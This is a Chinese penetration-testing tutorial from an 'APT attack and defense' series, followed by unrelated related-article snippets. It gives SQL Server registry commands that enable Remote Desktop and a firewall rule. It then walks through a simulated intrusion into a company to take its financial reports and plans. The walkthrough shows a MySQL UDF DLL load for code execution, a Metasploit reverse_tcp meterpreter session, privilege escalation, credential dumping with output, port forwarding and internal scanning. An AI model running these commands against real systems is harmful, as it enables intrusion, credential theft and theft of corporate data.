专注 APT 攻击与防御—sql server 常用操作远程桌面语句

SqlServer 常用操作远程桌面语句

1、是否开启远程桌面

  • 1:表示关闭
  • 0:表示开启
     
      
    1. EXEC master..xp_regread 'HKEY_LOCAL_MACHINE',
    2. 'SYSTEM\CurrentControlSet\Control\Terminal Server',
    3. 'fDenyTSConnections'

2、读取远程桌面端口

 
  1. EXEC master..xp_regread 'HKEY_LOCAL_MACHINE',
  2. 'SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp',
  3. 'PortNumber'

3、开启远程桌面

 
  1. EXEC master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE',
  2. 'SYSTEM\CurrentControlSet\Control\TerminalServer',
  3. 'fDenyTSConnections','REG_DWORD',0;

reg 文件开启远程桌面:

 
  1. Windows Registry Editor Version 5.00HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer]
  2. "fDenyTSConnections"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp]
  3. "PortNumber"=dword:00000d3d


保存 micropoor.reg,并执行 regedit /s micropoor.reg

注:如果第一次开启远程桌面,部分需要配置防火墙规则允许远程端口。

 
  1. netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP
  2. dir=in localport=3389 action=allow

4、关闭远程桌面

  1. EXEC master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE',
  2. 'SYSTEM\CurrentControlSet\Control\TerminalServer',
  3. 'fDenyTSConnections','REG_DWORD',1;

模拟诉求任务攻击

模拟任务:

拿到该公司明年计划,拿到该公司今年报表,并且摸清该公司组织架构。盈利情况。

1、主站 Shell

第一个shell为目标主站shell,为08 R2,提权后遂改变主意。由于是以APT为主,并不打算以主站权限为点渗透,动作太大。不利于长期跟踪。改变为搜集情报为主。配合下一步工作。

第八课:模拟诉求任务攻击 - 图1

主站为2008 R2:

第八课:模拟诉求任务攻击 - 图2

主站端口为:

第八课:模拟诉求任务攻击 - 图3

2、信息搜集

搜集端口为该公司的其他分站提供下一步探测。

  • 进程搜集:红色为重点搜集源
 
  1. > D:\> tasklist
  2. 映像名稱 PID 工作階段名稱 工作階段 # RAM使用量
  3. ========================= ======== ================ =========== ============
  4. System Idle Process 0 0 24 K
  5. System 4 0 372 K
  6. smss.exe 296 0 1,448 K
  7. csrss.exe 400 0 6,968 K
  8. wininit.exe 452 0 5,636 K
  9. csrss.exe 460 1 12,460 K
  10. winlogon.exe 496 1 6,484 K
  11. services.exe 556 0 10,392 K
  12. lsass.exe 572 0 22,076 K
  13. lsm.exe 584 0 7,104 K
  14. svchost.exe 676 0 10,840 K
  15. svchost.exe 760 0 9,492 K
  16. LogonUI.exe 852 1 19,632 K
  17. svchost.exe 864 0 21,188 K
  18. svchost.exe 904 0 34,904 K
  19. svchost.exe 944 0 13,476 K
  20. svchost.exe 996 0 13,512 K
  21. svchost.exe 168 0 19,480 K
  22. svchost.exe 648 0 12,348 K
  23. spoolsv.exe 1080 0 16,672 K
  24. armsvc.exe 1124 0 4,208 K
  25. apnmcp.exe 1172 0 5,832 K
  26. svchost.exe 1196 0 9,228 K
  27. aspnet_state.exe 1224 0 8,264 K
  28. FileZilla Server.exe 1344 0 7,876 K
  29. svchost.exe 1380 0 10,408 K
  30. inetinfo.exe 1412 0 31,680 K
  31. EngineServer.exe 1448 0 568 K
  32. FrameworkService.exe 1548 0 19,580 K
  33. VsTskMgr.exe 1612 0 1,724 K
  34. MDM.EXE 1680 0 6,652 K
  35. naPrdMgr.exe 1692 0 2,116 K
  36. mfevtps.exe 1720 0 992 K
  37. sqlservr.exe 1760 0 13,284 K
  38. svchost.exe 1844 0 3,452 K
  39. snmp.exe 1868 0 9,264 K
  40. sqlwriter.exe 1904 0 7,440 K
  41. vmtoolsd.exe 1976 0 17,012 K
  42. snmp.exe 1988 0 3,164 K
  43. conhost.exe 1996 0 4,784 K
  44. vmware-converter-a.exe 2068 0 31,460 K
  45. vmware-converter.exe 2180 0 38,176 K
  46. vmware-converter.exe 2228 0 32,828 K
  47. svchost.exe 2288 0 14,152 K
  48. McShield.exe 2320 0 89,332 K
  49. mfeann.exe 2468 0 5,860 K
  50. conhost.exe 2476 0 3,380 K
  51. w3wp.exe 2592 0 160,760 K
  52. w3wp.exe 2812 0 463,872 K
  53. svchost.exe 3452 0 9,656 K
  54. svchost.exe 4104 0 6,384 K
  55. dllhost.exe 4252 0 12,192 K
  56. msdtc.exe 4424 0 8,708 K
  57. svchost.exe 4196 0 34,760 K
  58. w3wp.exe 5604 0 12,632 K
  59. TrustedInstaller.exe 4500 0 11,788 K
  60. cmd.exe 6292 0 3,932 K
  61. conhost.exe 6384 0 4,476 K
  62. tasklist.exe 1496 0 6,064 K
  63. WmiPrvSE.exe 5508 0 7,272 K
  • 账户搜集:(已处理)

  • 重要路径搜集:
    (无图,路径搜集为未来可能需要dump file做准备)

  • 数据库密码搜集:
    (无图,密码搜集为未来可能需要碰撞做准备)

  • 杀毒软件搜集: 强力的麦咖啡

  • 管理员习惯搜集:
    (无图,尽量避免与admin的fvsf)(面对面的vs是不是这么拼写?)

  • 其他搜集:
    (由于是第一个shell,具体的已经忘记了)

3、第二台服务器权限

第二台服务器权限:window x86 2003

根据上一台的服务器情报搜集很快得到了一台win03
 

第八课:模拟诉求任务攻击 - 图5

第八课:模拟诉求任务攻击 - 图6

  • IP .3

    第八课:模拟诉求任务攻击 - 图7

为一台开发机。目标仅支持 asp,无其他脚本支持。但是服务器中安装有 mysql,php 等。并且无 asp to mysql Device Drive IIS 配置中也并不支持 php。msf 反弹后,继续搜集情报。

 
  1. type C:\MySQL\MySQL Server 5.0\data\mysql\user.MYD

得到 root hash

在实际情况中,交互的shell下运行 mysql -uroot -pxxx 无法继续交互,需要参数 e 解决这个问题。

 
  1. mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);"
  2. mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values (hex(load_file('C:\\xxxx\\xxxx.dll')));"
  3. mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE
  4. 'c:\\windows\\system32\\xxxx.dll';"
  5. mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'"
  6. mysql -uroot -pxxxxxxxx mysql -e "select shell('cmd','C:\\xxxx\\xxx\\xxxxx.exe');"

第八课:模拟诉求任务攻击 - 图8

如果限制上传大小同样可以hex解决上传大小问题。

4、msf 操作实例

以下为部分msf操作实例

 
  1. msf > use exploit/multi/handler
  2. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  3. msf exploit(handler) > exploit -l
  4. meterpreter > ps
  5. Process List
  6. ============
  7. PID PPID Name Arch Session User Path
  8. --- ---- ---- ---- ------- ---- ----
  9. 0 0 [System Process]
  10. 4 0 System x86 0 NT AUTHORITY\SYSTEM
  11. 304 4 smss.exe x86 0 NT AUTHORITY\SYSTEM\SystemRoot\System32\smss.exe
  12. 352 304 csrss.exe x86 0 NT AUTHORITY\SYSTEM \?? \C:\WINDOWS\system32\csrss.exe
  13. 376 304 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \?? \C:\WINDOWS\system32\winlogon.exe
  14. 424 376 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
  15. 436 376 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
  16. 620 424 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
  17. 636 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
  18. 708 424 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
  19. 768 424 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
  20. 812 424 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
  21. 828 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
  22. 1000 424 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
  23. 1028 424 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
  24. 1160 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
  25. 1228 424 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
  26. 1252 424 sqlservr.exe x86 0 NT AUTHORITY\SYSTEM C:\PROGRA\~1\MICROS~1\MSSQL\binn\sqlservr.exe
  27. 1304 424 mysqld.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
  28. 1348 424 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
  29. 1408 424 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
  30. 1472 424 mssearch.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe
  31. 1720 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
  32. 2128 2084 explorer.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\Explorer.EXE
  33. 2208 2128 vmtoolsd.exe x86 0 xxxxxxxxxxxx\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
  34. 2232 2128 ctfmon.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\ctfmon.exe
  35. 2244 2128 sqlmangr.exe x86 0 xxxxxxxxxxxx\Administrator C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
  36. 2396 424 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
  37. 2440 424 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
  38. 3008 2128 cmd.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\cmd.exe
  39. 3024 3008 conime.exe x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\conime.exe
  40. 3180 636 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe
  41. 3248 828 wuauclt.exe xxxxxxxxxxxx\Administrator C:\WINDOWS\system32\wuauclt.exe
  42. 3380 376 logon.scr x86 0 xxxxxxxxxxxx\Administrator C:\WINDOWS\System32\logon.scr
 
  1. meterpreter > migrate 2128
  2. [*] Migrating from 3104 to 2128...
  3. [*] Migration completed successfully. meterpreter > getsystem
  4. ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
  5. meterpreter > getuid
  6. Server username: NT AUTHORITY\SYSTEM meterpreter > msv
  7. [+] Running as SYSTEM
  8. [*] Retrieving msv credentials msv credentials
  9. ===============
  10. AuthID Package Domain User Password
  11. ------ ------- ------ ---- --------
  12. 0;109205 NTLM xxxxxxxxxxxx Administrator lm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}, ntlm{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }
  13. 0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }, ntlm{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }
  14. 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
  15. 0;54469 NTLM n.s. (Credentials KO)
  16. 0;999 NTLM WORKGROUP xxxxxxxxxxxx\$ n.s. (Credentials KO)
 
  1. meterpreter > kerberos [+] Running as SYSTEM
  2. [*] Retrieving kerberos credentials kerberos credentials
  3. ====================
  4. AuthID Package Domain User Password
  5. ------ ------- ------ ---- --------
  6. 0;996 Negotiate NT AUTHORITY NETWORK SERVICE
  7. 0;997 Negotiate NT AUTHORITY LOCAL SERVICE
  8. 0;54469 NTLM
  9. 0;999 NTLM WORKGROUP xxxxxxxxxxxx$
  10. 0;109205 NTLM xxxxxxxxxxxx Administrator 123456
  11. meterpreter > portfwd add -l 3389 -r x.x.x.x -p 3389 #IP已做处理
  12. [*] Local TCP relay created: :3389 <-> x.x.x.x:3389
  13. meterpreter > portfwd
  14. Active Port Forwards
  15. ====================
  16. Index Local Remote Direction
  17. ----- ----- ------ ---------
  18. 1 0.0.0.0:3389 x.x.x.x:3389 Forward
  19. 1 total active port forwards.
  20. root@xxxx:/# rdesktop 127.0.0.1:3389 Autoselected keyboard map en-us
  21. Failed to negotiate protocol, retrying with plain RDP.
  22. WARNING: Remote desktop does not support colour depth 24; falling back to 16
  23. meterpreter > run autoroute -h
  24. [*] Usage: run autoroute [-r] -s subnet -n netmask
  25. [*] Examples:
  26. [*] run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to
  27. 10.10.10.1/255.255.255.0
  28. [*] run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0
  29. [*] run autoroute -s 10.10.10.1/24 # CIDR notation is also okay
  30. [*] run autoroute -p # Print active routing table
  31. [*] run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route
  32. [*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
  33. [-] Deprecation warning: This script has been replaced by the post/windows/manage/autoroute module
  34. meterpreter > ifconfig
  35. Interface 1
  36. ============
  37. Name : MS TCP Loopback interface
  38. Hardware MAC : 00:00:00:00:00:00
  39. MTU : 1520
  40. IPv4 Address : 127.0.0.1
  41. Interface 2
  42. ============
  43. Name : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport
  44. Hardware MAC : 00:11:25:40:77:8f
  45. MTU : 1500
  46. IPv4 Address : 10.23.255.3 IPv4 Netmask : 255.255.255.0
  47. meterpreter > run autoroute -s 10.23.255.3 -n 255.255.255.0
  48. [*] Adding a route to 10.23.255.3/255.255.255.0...
  49. [+] Added route to 10.23.255.3/255.255.255.0 via 61.57.243.227
  50. [*] Use the -p option to list all active routes
  51. meterpreter > run autoroute -p
  52. Active Routing Table
  53. ====================
  54. Subnet Netmask Gateway
  55. ------ ------- -------
  56. 10.23.255.3 255.255.255.0 Session 3
  57. meterpreter > ifconfig
  58. Interface 1
  59. ============
  60. Name : MS TCP Loopback interface
  61. Hardware MAC : 00:00:00:00:00:00
  62. MTU : 1520
  63. IPv4 Address : 127.0.0.1
  64. Interface 2
  65. ============
  66. Name : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport
  67. Hardware MAC : 00:11:25:40:77:8f
  68. MTU : 1500
  69. IPv4 Address : 10.23.255.3 IPv4 Netmask : 255.255.255.0
  70. meterpreter >
  71. Background session 3? [y/N]
  72. msf auxiliary(tcp) > use auxiliary/scanner/portscan/tcp
  73. msf auxiliary(tcp) > show options
  74. Module options (auxiliary/scanner/portscan/tcp):
  75. Name Current Setting Required Description
  76. ---- --------------- -------- -----------
  77. CONCURRENCY 10 yes The number of concurrent ports to check per host
  78. DELAY 0 yes The delay between connections, per thread, in milliseconds
  79. JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
  80. PORTS 445,80,3389,22 yes Ports to scan (e.g. 22-25,80,110-900)
  81. RHOSTS 10.23.255.1-255 yes The target address range or CIDR identifier
  82. THREADS 10 yes The number of concurrent threads
  83. TIMEOUT 1000 yes The socket connect timeout in milliseconds

最终得到了域控权限,并且得到了跨段的服务器权限。得到了个人机的重要权限,以及公司财报doc。

部分截图如下:由于时间问题,顺序可能打乱了。

第八课:模拟诉求任务攻击 - 图9

第八课:模拟诉求任务攻击 - 图10

第八课:模拟诉求任务攻击 - 图11

第八课:模拟诉求任务攻击 - 图12

跳段, 个人机

第八课:模拟诉求任务攻击 - 图13

第八课:模拟诉求任务攻击 - 图14

放弃权限,所有操作并未更改,下载,删除等一切损害该公司的行为。

第八课:模拟诉求任务攻击 - 图15

至此由虚拟机跳段到了工作办公机,(典型的A-B-C类跳板)得到了该公司的下年计划,人员组织构架,财务报表,盈利情况,以及内部相关work文档等。

文章来源:《专注 APT 攻击与防御 - Micro8 系列教程》 - 书栈网 · BookStack

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/586614.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

LabVIEW飞机机电系统综合测试平台

LabVIEW飞机机电系统综合测试平台 在现代航空领域&#xff0c;机电系统的准确性与可靠性对飞行安全至关重要。针对飞机机电管理计算机&#xff08;UMC&#xff09;复杂度增加、测试覆盖率低、效率不高等问题&#xff0c;开发了一套基于LabVIEW的机电系统综合测试平台。平台通过…

1天搞定uniApp+Vue3+vite+Element UI或者Element Plus开发学习,使用vite构建管理项目,HBuilderX做为开发者工具

我们通常给小程序或者app开发后台时&#xff0c;不可避免的要用到可视化的数据管理后台&#xff0c;而vue和Element是我们目前比较主流的开发管理后台的主流搭配。所以今天石头哥就带大家来一起学习下vue3和Element plus的开发。 准备工作 1&#xff0c;下载HBuilderX 开发者…

qt嵌入并控制外部程序

一、流程 1、调用Window接口模拟鼠标&#xff0c;键盘事件 POINT point; LPPOINT lpppoint &point; GetCursorPos(lpppoint);//获取鼠标位置 SetCursorPos(point.x, point.y);//设置鼠标位置//鼠标左键按下 mouse_event(MOUSEEVENTF_LEFTDOWN | MOUSEEVENTF_LEFTUP, poi…

Stm32CubeMX 为 stm32mp135d 添加 spi

Stm32CubeMX 为 stm32mp135d 添加 spi 一、启用设备1. spi 设备添加2. spi 引脚配置2. spi 时钟配置 二、 生成代码1. optee 配置 spi 时钟和安全验证2. linux spi 设备 dts 配置 bringup 可参考&#xff1a;Stm32CubeMX 生成设备树 一、启用设备 1. spi 设备添加 选中spi设…

Django后台项目开发实战四

用户可以浏览工作列表以及工作详情 第四阶段 在 jobs 文件夹下创建 templates 文件夹&#xff0c;在里面创建 base.html 网页&#xff0c;内容如下 <!-- base.html --> <div style"text-align:center;"><h1 style "margin:auto; width:50%;&…

【Canvas与艺术】绘制地平线

【关键点】 灭点在透视中的作用。 【成图】 【代码】 <!DOCTYPE html> <html lang"utf-8"> <meta http-equiv"Content-Type" content"text/html; charsetutf-8"/> <head><title>使用HTML5/Canvas绘制地平线<…

神经网络的优化器

神经网络的优化器是用于训练神经网络的一类算法&#xff0c;它们的核心目的是通过改变神经网络的权值参数来最小化或最大化一个损失函数。优化器对损失函数的搜索过程对于神经网络性能至关重要。 作用&#xff1a; 参数更新&#xff1a;优化器通过计算损失函数相对于权重参数的…

洞察Agent AI智能体的未来:机遇与挑战并存

&#x1f512;文章目录&#xff1a; &#x1f6f4;什么是Agent AI智能体 &#x1f4a5;Agent AI智能体的技术组成 ☂️Agent AI智能体的应用场景 &#x1f4a3;Agent AI智能体的挑战与问题 &#x1f6b2; Agent AI智能体在未来社会中的角色和影响 ❤️对Agent AI智能体未来的期…

【人工智能AI书籍】TensorFlow机器学习实战指南(推荐)

今天又来给大家推荐一本人工智能方面的书籍<TensorFlow机器学习实战指南>。TensorFlow是一个开源机器学习库。本书从TensorFlow的基础开始介绍&#xff0c;涉及变量、矩阵和各种数据源。之后&#xff0c;针对使用TensorFlow线性回归技术的实践经验进行详细讲解。后续章节…

[1688]jsp工资投放管理系统Myeclipse开发mysql数据库web结构java编程计算机网页项目

一、源码特点 JSP 工资投放管理系统是一套完善的java web信息管理系统&#xff0c;对理解JSP java编程开发语言有帮助&#xff0c;系统具有完整的源代码和数据库&#xff0c;系统主要采用B/S模式开发。开发环境为 TOMCAT7.0,Myeclipse8.5开发&#xff0c;数据库为Mysql5.0…

[1671]jsp教材管理系统Myeclipse开发mysql数据库web结构java编程计算机网页项目

一、源码特点 JSP 教材管理系统是一套完善的java web信息管理系统&#xff0c;对理解JSP java编程开发语言有帮助&#xff0c;系统具有完整的源代码和数据库&#xff0c;系统主要采用B/S模式开发。开发环境为TOMCAT7.0,Myeclipse8.5开发&#xff0c;数据库为Mysql5.0&…

k8s 资源组版本支持列表

1 kubernetes的资源注册表 kube-apiserver组件启动后的第一件事情是将Kubernetes所支持的资源注册到Scheme资源注册表中,这样后面启动的逻辑才能够从Scheme资源注册表中拿到资源信息并启动和运行API服务。 kube-apiserver资源注册分为两步:第1步,初始化Scheme资源注册表;…

社交媒体数据恢复:推特、Twitter

推特&#xff08;Twitter&#xff09;数据恢复&#xff1a;如何找回丢失的内容 随着社交媒体的普及&#xff0c;越来越多的人开始使用推特&#xff08;Twitter&#xff09;来分享生活点滴、发表观点和获取信息。然而&#xff0c;有时候我们会不小心删除了重要的推文&#xff0…

【Jenkins】持续集成与交付 (四):修改Jenkins插件下载地址、汉化

🟣【Jenkins】持续集成与交付 (四):修改Jenkins插件下载地址、汉化 一、修改Jenkins插件下载地址二、汉化Jenkins三、关于Jenkins💖The Begin💖点点关注,收藏不迷路💖 一、修改Jenkins插件下载地址 由于Jenkins官方插件地址下载速度较慢,我们可以通过修改下载地址…

上位机图像处理和嵌入式模块部署(树莓派4b利用驱动实现进程数据共享)

【 声明&#xff1a;版权所有&#xff0c;欢迎转载&#xff0c;请勿用于商业用途。 联系信箱&#xff1a;feixiaoxing 163.com】 前面我们讨论过&#xff0c;目前在linux系统上面有很多办法可以实现多进程数据共享。这里面比如说管道&#xff0c;比如说共享内存&#xff0c;比如…

uniapp 自定义 App启动图

由于uniapp默认的启动界面太过普通 所以需要自定义个启动图 普通的图片不可以过不了苹果的审核 所以使用storyboard启动图 生成 storyboard 的网站&#xff1a;初雪云-提供一站式App上传发布解决方案

Docker-compose部署LTC同步节点

1、下载ltc程序包&#xff0c;litecoin下载地址 下载页 mkdir /data/docker-compose/ltc cd /data/docker-compose/ltc https://github.com/litecoin-project/litecoin/releases/download/v0.21.3/litecoin-0.21.3-x86_64-linux-gnu.tar.gz2、编写dockerfile和bitcoin.conf b…

笔记-word导出PDF老是更新域导致图片和表格题注发生变化

问题描述&#xff1a;微软word 导出PDF时&#xff0c;老是更新域&#xff0c;导致图片和表格题注否跟着变化 以下是解决方法的具体描述。 目录 一、准备工作二、操作步骤 一、准备工作 1、工具版本&#xff1a;微软 word 2016&#xff08;其他微软word版本也OK&#xff09; …

第二证券投资参考:汽车以旧换新细则发布 云厂商AI投资持续加码

上星期五&#xff0c;A股放量大涨。两市股指盘中单边上行&#xff0c;午后再度攀升&#xff0c;沪指涨超1%&#xff0c;创业板指大涨超3%&#xff1b;到收盘&#xff0c;沪指涨1.17%报3088.64点&#xff0c;深证成指涨2.15%报9463.91点&#xff1b;创业板指涨3.34%报1823.74点&…

2024五一数学建模B题思路代码与论文分析

2024五一数学建模B题完整代码和成品论文获取↓↓↓↓↓ https://www.yuque.com/u42168770/qv6z0d/gyoz9ou5upvkv6nx?singleDoc# B题 未来新城交通需求规划与可达率问题需要建立的模型和算法: 1. 图论 2. 网络流模型 3. 线性规划/整数规划 4. 组合优化 5. 随机过程 6. …